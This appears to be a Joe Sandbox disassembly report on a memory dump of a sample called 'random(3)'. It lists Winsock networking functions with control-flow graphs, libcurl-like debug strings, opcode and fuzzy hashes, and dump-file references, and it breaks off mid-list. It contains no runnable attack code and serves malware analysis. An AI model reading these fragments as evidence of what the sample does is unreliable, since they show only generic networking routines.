                                                control_flow_graph 1522 c576a0-c576be 1523 c576e6-c576f2 send 1522->1523 1524 c576c0-c576c7 1522->1524 1526 c576f4-c57709 call c572a0 1523->1526 1527 c5775e-c57762 1523->1527 1524->1523 1525 c576c9-c576d1 1524->1525 1528 c576d3-c576e4 1525->1528 1529 c5770b-c57759 call c572a0 call c5cb20 call fd8c50 1525->1529 1526->1527 1528->1526 1529->1527
                                                APIs
                                                • send.WS2_32(multi.c,?,?,?,00C53D4E,00000000,?,?,00C607BF), ref: 00C576EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: send
                                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                • API String ID: 2809346765-3388739168
                                                • Opcode ID: ed04a4169f0c5045b8570855f9c88bfb49740837804f4b8d56ac5c0a17ab898c
                                                • Instruction ID: a5ef0df06ae262057488d1159558a3a19aca9aba4c9ebd22fadd81328e4da3d7
                                                • Opcode Fuzzy Hash: ed04a4169f0c5045b8570855f9c88bfb49740837804f4b8d56ac5c0a17ab898c
                                                • Instruction Fuzzy Hash: 801127F9A093047BE5319B19BC45E277B5CDBC1B69F050A0CFD1813242DB619C8486B6
                                                Function 00C57770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1641 c57770-c5778e 1642 c577b6-c577c2 recv 1641->1642 1643 c57790-c57797 1641->1643 1645 c577c4-c577d9 call c572a0 1642->1645 1646 c5782e-c57832 1642->1646 1643->1642 1644 c57799-c577a1 1643->1644 1647 c577a3-c577b4 1644->1647 1648 c577db-c57829 call c572a0 call c5cb20 call fd8c50 1644->1648 1645->1646 1647->1645 1648->1646
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: recv
                                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                • API String ID: 1507349165-640788491
                                                • Opcode ID: a2f005f540ccfe4cccdb14d8cf62fae8613053e9cf614d27904108c3d970ce76
                                                • Instruction ID: 966339f954941ae8681677d15fd69d2238c253d01c26ca8cf13d18473f7b5d11
                                                • Opcode Fuzzy Hash: a2f005f540ccfe4cccdb14d8cf62fae8613053e9cf614d27904108c3d970ce76
                                                • Instruction Fuzzy Hash: 71112BF9A053047BE1209B15BC49E277B5CDBC6B69F050A1CFD1423341D7619C84C2B6
                                                Function 00C575E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1660 c575e0-c575ed 1661 c57607-c57629 socket 1660->1661 1662 c575ef-c575f6 1660->1662 1664 c5763f-c57642 1661->1664 1665 c5762b-c5763c call c572a0 1661->1665 1662->1661 1663 c575f8-c575ff 1662->1663 1666 c57601-c57602 1663->1666 1667 c57643-c57699 call c572a0 call c5cb20 call fd8c50 1663->1667 1665->1664 1666->1661
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: socket
                                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                • API String ID: 98920635-842387772
                                                • Opcode ID: f64e3810f8e6b3c3d96fc69d724b3040013f9005a2fad47b9eca275cd8c6d2a5
                                                • Instruction ID: 8503fbe396fa13cef63cfac376b50973f29f11f40c8dd1abf8cd06269211df0a
                                                • Opcode Fuzzy Hash: f64e3810f8e6b3c3d96fc69d724b3040013f9005a2fad47b9eca275cd8c6d2a5
                                                • Instruction Fuzzy Hash: 44118CB9A0475127D6205B29BC4AF4B3B88DF81736F040A18FD20922E5DB11CDD8D3E2
                                                Function 00C8A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1769 c8a150-c8a159 1770 c8a15f-c8a17b 1769->1770 1771 c8a250 1769->1771 1772 c8a249-c8a24f 1770->1772 1773 c8a181-c8a1ce getsockname 1770->1773 1772->1771 1774 c8a1d0-c8a1f5 call c6d090 1773->1774 1775 c8a1f7-c8a214 call c8ef30 1773->1775 1782 c8a240-c8a246 call c94f40 1774->1782 1775->1772 1780 c8a216-c8a23b call c6d090 1775->1780 1780->1782 1782->1772
                                                APIs
                                                • getsockname.WS2_32(?,?,00000080), ref: 00C8A1C7
                                                Strings
                                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00C8A23B
                                                • getsockname() failed with errno %d: %s, xrefs: 00C8A1F0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: getsockname
                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                • API String ID: 3358416759-2605427207
                                                • Opcode ID: 4e1b91e7b54d01906daa61cd4bdc5818f0039fdb66b5a39c243cf7ae4b12d666
                                                • Instruction ID: c1c837a32f22e0c2f5551b0c0ad1d79c063899a8f4cb436ca92eeb16142ca3a5
                                                • Opcode Fuzzy Hash: 4e1b91e7b54d01906daa61cd4bdc5818f0039fdb66b5a39c243cf7ae4b12d666
                                                • Instruction Fuzzy Hash: 88210A71908680AAF7369B19DC46FE773BCEF81328F040615F99853051FB32698687E6
                                                Function 00C6D5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1789 c6d5e0-c6d5ee 1790 c6d652-c6d662 WSAStartup 1789->1790 1791 c6d5f0-c6d604 call c6d690 1789->1791 1792 c6d664-c6d66f 1790->1792 1793 c6d670-c6d676 1790->1793 1797 c6d606-c6d614 1791->1797 1798 c6d61b-c6d651 call c77620 1791->1798 1793->1791 1795 c6d67c-c6d68d 1793->1795 1797->1798 1803 c6d616 1797->1803 1803->1798
                                                APIs
                                                • WSAStartup.WS2_32(00000202), ref: 00C6D65A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: Startup
                                                • String ID: if_nametoindex$iphlpapi.dll
                                                • API String ID: 724789610-3097795196
                                                • Opcode ID: 87bdbc04fa9132c15378127ce446a97146315579b34db92b2ef3fe2780d548ca
                                                • Instruction ID: 1007bb71d5d2aca97031eaed7ba145d35d5ec57bc14186f8915372f7a6a6fe21
                                                • Opcode Fuzzy Hash: 87bdbc04fa9132c15378127ce446a97146315579b34db92b2ef3fe2780d548ca
                                                • Instruction Fuzzy Hash: DC0142D0F4438543E7317B3CD85732661945B11304F480D6CE8A98129AFB2ACA88C293
                                                Function 00D1AA30 Relevance: 4.9, APIs: 3, Instructions: 377networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1805 d1aa30-d1aa64 1807 d1ab04-d1ab09 1805->1807 1808 d1aa6a-d1aaa7 call d0e730 1805->1808 1809 d1ae80-d1ae89 1807->1809 1812 d1aaa9-d1aabd 1808->1812 1813 d1ab0e-d1ab13 1808->1813 1815 d1ab18-d1ab50 1812->1815 1816 d1aabf-d1aac7 1812->1816 1814 d1ae2e 1813->1814 1817 d1ae30-d1ae4a call d0ea60 call d0ebf0 1814->1817 1821 d1ab58-d1ab6d 1815->1821 1816->1814 1818 d1aacd-d1ab02 1816->1818 1830 d1ae75-d1ae7d 1817->1830 1831 d1ae4c-d1ae57 1817->1831 1818->1821 1824 d1ab96-d1abab socket 1821->1824 1825 d1ab6f-d1ab73 1821->1825 1824->1814 1829 d1abb1-d1abc5 1824->1829 1825->1824 1827 d1ab75-d1ab8f 1825->1827 1827->1829 1843 d1ab91 1827->1843 1832 d1abd0-d1abed ioctlsocket 1829->1832 1833 d1abc7-d1abca 1829->1833 1830->1809 1835 d1ae59-d1ae5e 1831->1835 1836 d1ae6e-d1ae6f 1831->1836 1838 d1ac10-d1ac14 1832->1838 1839 d1abef-d1ac0a 1832->1839 1833->1832 1837 d1ad2e-d1ad39 1833->1837 1835->1836 1846 d1ae60-d1ae6c 1835->1846 1836->1830 1844 d1ad52-d1ad56 1837->1844 1845 d1ad3b-d1ad4c 1837->1845 1840 d1ac37-d1ac41 1838->1840 1841 d1ac16-d1ac31 1838->1841 1839->1838 1850 d1ae29 1839->1850 1848 d1ac43-d1ac46 1840->1848 1849 d1ac7a-d1ac7e 1840->1849 1841->1840 1841->1850 1843->1814 1844->1850 1851 d1ad5c-d1ad6b 1844->1851 1845->1844 1845->1850 1846->1830 1853 d1ad04-d1ad08 1848->1853 1854 d1ac4c-d1ac51 1848->1854 1855 d1ac80-d1ac9b 1849->1855 1856 d1ace7-d1ad03 1849->1856 1850->1814 1858 d1ad70-d1ad78 1851->1858 1853->1837 1862 d1ad0a-d1ad28 1853->1862 1854->1853 1863 d1ac57-d1ac78 1854->1863 1855->1856 1864 d1ac9d-d1acc1 1855->1864 1856->1853 1860 d1ada0-d1adae connect 1858->1860 1861 d1ad7a-d1ad7f 1858->1861 1867 d1adb3-d1adcf 1860->1867 1861->1860 1865 d1ad81-d1ad99 1861->1865 1862->1837 1862->1850 1868 d1acc6-d1acd7 1863->1868 1864->1868 1865->1867 1875 d1add5-d1add8 1867->1875 1876 d1ae8a-d1ae91 1867->1876 1868->1850 1874 d1acdd-d1ace5 1868->1874 1874->1853 1874->1856 1877 d1ade1-d1adf1 1875->1877 1878 d1adda-d1addf 1875->1878 1876->1817 1879 d1adf3-d1ae07 1877->1879 1880 d1ae0d-d1ae12 1877->1880 1878->1858 1878->1877 1879->1880 1886 d1aea8-d1aead 1879->1886 1881 d1ae14-d1ae17 1880->1881 1882 d1ae1a-d1ae1c call d1af70 1880->1882 1881->1882 1885 d1ae21-d1ae23 1882->1885 1887 d1ae93-d1ae9d 1885->1887 1888 d1ae25-d1ae27 1885->1888 1886->1817 1889 d1aeaf-d1aeb1 call d0e760 1887->1889 1890 d1ae9f-d1aea6 call d0e7c0 1887->1890 1888->1817 1894 d1aeb6-d1aebe 1889->1894 1890->1894 1895 d1aec0-d1aedb call d0e180 1894->1895 1896 d1af1a-d1af1f 1894->1896 1895->1817 1899 d1aee1-d1aeec 1895->1899 1896->1817 1900 d1af02-d1af06 1899->1900 1901 d1aeee-d1aeff 1899->1901 1902 d1af08-d1af0b 1900->1902 1903 d1af0e-d1af15 1900->1903 1901->1900 1902->1903 1903->1809
                                                APIs
                                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00D1AB9B
                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00D1ABE3
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: ioctlsocketsocket
                                                • String ID:
                                                • API String ID: 416004797-0
                                                • Opcode ID: 7d1ebf244ac3be812ac759757e5b23fc2fad257963d1128d4acbb0e31cf971dc
                                                • Instruction ID: ed55d3d83c4f0f5862fd9c89712bf575a1e84c645097e8b2b3c186f921fe2c72
                                                • Opcode Fuzzy Hash: 7d1ebf244ac3be812ac759757e5b23fc2fad257963d1128d4acbb0e31cf971dc
                                                • Instruction Fuzzy Hash: F2E1E770705301ABE720CF18E844BA777E5FF85310F144A2DF9988B291EB75D984CBA2
                                                Function 00C578B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: closesocket
                                                • String ID: FD %s:%d sclose(%d)
                                                • API String ID: 2781271927-3116021458
                                                • Opcode ID: 5746c19f620d133166bd2f5092709a1df503300c915d5541574410d4c70eb6cf
                                                • Instruction ID: 3abfdc0b98005c070870e521ba7a2f9474d1adfec4d0ab7d966336bbc5bfe995
                                                • Opcode Fuzzy Hash: 5746c19f620d133166bd2f5092709a1df503300c915d5541574410d4c70eb6cf
                                                • Instruction Fuzzy Hash: 6BD05E26A0A220AB85206599BD44C5B7BA8DEC6F20B06095CF95477204D2209C8593E7
                                                Function 00D1B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00D1B29E,?,00000000,?,?), ref: 00D1B0B9
                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00D03C41,00000000), ref: 00D1B0C1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: ErrorLastconnect
                                                • String ID:
                                                • API String ID: 374722065-0
                                                • Opcode ID: 4a67012266693df0379472672b4a3b7caadbc42bf46e458dc1d862c13a264597
                                                • Instruction ID: ffedc7852f899410b63b2d461567bdab366528ab4eea3216f4ba61f8232b9249
                                                • Opcode Fuzzy Hash: 4a67012266693df0379472672b4a3b7caadbc42bf46e458dc1d862c13a264597
                                                • Instruction Fuzzy Hash: 8B01DD363042006BCA205A699844FA7B799FF4E374F080719F978931D1DB26DD904761
                                                Function 00D04950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • gethostname.WS2_32(00000000,00000040), ref: 00D04AA5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
